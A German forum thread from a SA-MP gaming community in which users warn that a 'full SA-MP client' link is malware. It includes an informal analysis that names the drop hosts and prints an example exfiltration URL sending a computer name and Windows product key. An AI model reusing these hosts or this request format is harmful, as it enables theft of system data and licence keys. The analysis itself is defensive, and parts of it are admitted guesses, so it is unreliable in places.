Im Chat Farbig schreiben

  • Nabend,


    grad eben kam einer auf unseren Server (GF EDIT) und hat Farbig im OOC geschriebene und im normalen chat ich hab dann versucht mit ~r(ed)~ unsw. das auch hinzubekommen ging aber nicht er meine ich brüchte ein Full- samp client dafür aht er den link ....gepostet aber ich denke das ist nur verarsche oder?

    Einmal editiert, zuletzt von NeoPhoenix ()

  • aber nicht er meine ich brüchte ein Full- samp client dafür aht er den link (http:// - sa-mp.no-ip - .org/ [SBIKA: malware - nicht ausfuehren!]) gepostet aber ich denke das ist nur verarsche oder?


    Allerdings. Es handelt sich um eine exe mit 14MB muell im Anhang hat. Ausserdem ist es kein nsis installer (wie sa-mp ihn benutzt), sondern eine normale Exe.
    Die exe ist ein script-kiddy tool, was (woertlich) kinderleicht zu konfigurieren ist. Serverseitig laeuft ein einfaches joomla-get-syntax-basiertes script (get parameter, wie bei joomla, muss aber nicht umbedingt ein joomla script sein) und client seitig wird die registrierungsseite mit den Informationen aufgerufen, die gestohlen werden sollen.
    (Lediglich vermutungen darauf basierend, was ich ueber die exe bis jetzt herrausgefunden habe - saemtliche Informationen koennten auch falsch sein, sind sie aber meine Meinung nach nicht, da vieles darauf hinweist, dass es das Programm ist, welches ich vermute.)


    Edit:
    Das programm wird die gesammelten Daten an http://www.hubbzo.bplaced.net/index.php uebergeben.


    Hier details. Am Ende der Seite sieht man die Daten, die eventuell geklaut werden:

    Code
    http://sellingtechnologies.com/newsite/logs/joomla/?action=add&a=4&c=COMPUTERNAME&u=-&l=Microsoft%20Windows%20XP%20Professional&p=K8QV4-X3PXT-J8X6C-V7GK7-HYPMM


    action = "add" (bei dem mir vorliegenden phpquellcode gibt es auch ein "test", welches anzeigt, ob bereits ein Opfer in der Datenbank eingetragen wurde.. was bei diesem script kiddy der fall ist.. schade, wenn es jemand tatsaechlich ausgefuehrt hat - die meisten Anti-Virus programme schlagen bei diesem programm sofort alarm)
    a = nummber zwischen 0 und 18
    c = computername
    u = url (?)
    l = produkt
    p = produkt key (strlen mindestens 3)
    dazu werden IP und Datum gespeichert. Alles in einer SQL-tabelle. Der php quellcode der mir vorliegt ist aber gegen moegliche SQL-injektionen geschuetzt und das password, sowie username fuer admin zugriff sind hardcoded.
    Eventuell koennte ein abuse-report bei no-ip und bplaced helfen, damit script-kiddy sein spielzeug verliert.

    2 Mal editiert, zuletzt von SBIKA ()


  • Allerdings. Es handelt sich um eine exe mit 14MB muell im Anhang hat. Ausserdem ist es kein nsis installer (wie sa-mp ihn benutzt), sondern eine normale Exe.
    Die exe ist ein script-kiddy tool, was (woertlich) kinderleicht zu konfigurieren ist. Serverseitig laeuft ein einfaches joomla-get-syntax-basiertes script (get parameter, wie bei joomla, muss aber nicht umbedingt ein joomla script sein) und client seitig wird die registrierungsseite mit den Informationen aufgerufen, die gestohlen werden sollen.
    (Lediglich vermutungen darauf basierend, was ich ueber die exe bis jetzt herrausgefunden habe - saemtliche Informationen koennten auch falsch sein, sind sie aber meine Meinung nach nicht, da vieles darauf hinweist, dass es das Programm ist, welches ich vermute.)

    Oder kurz gesagt eine Trojaner?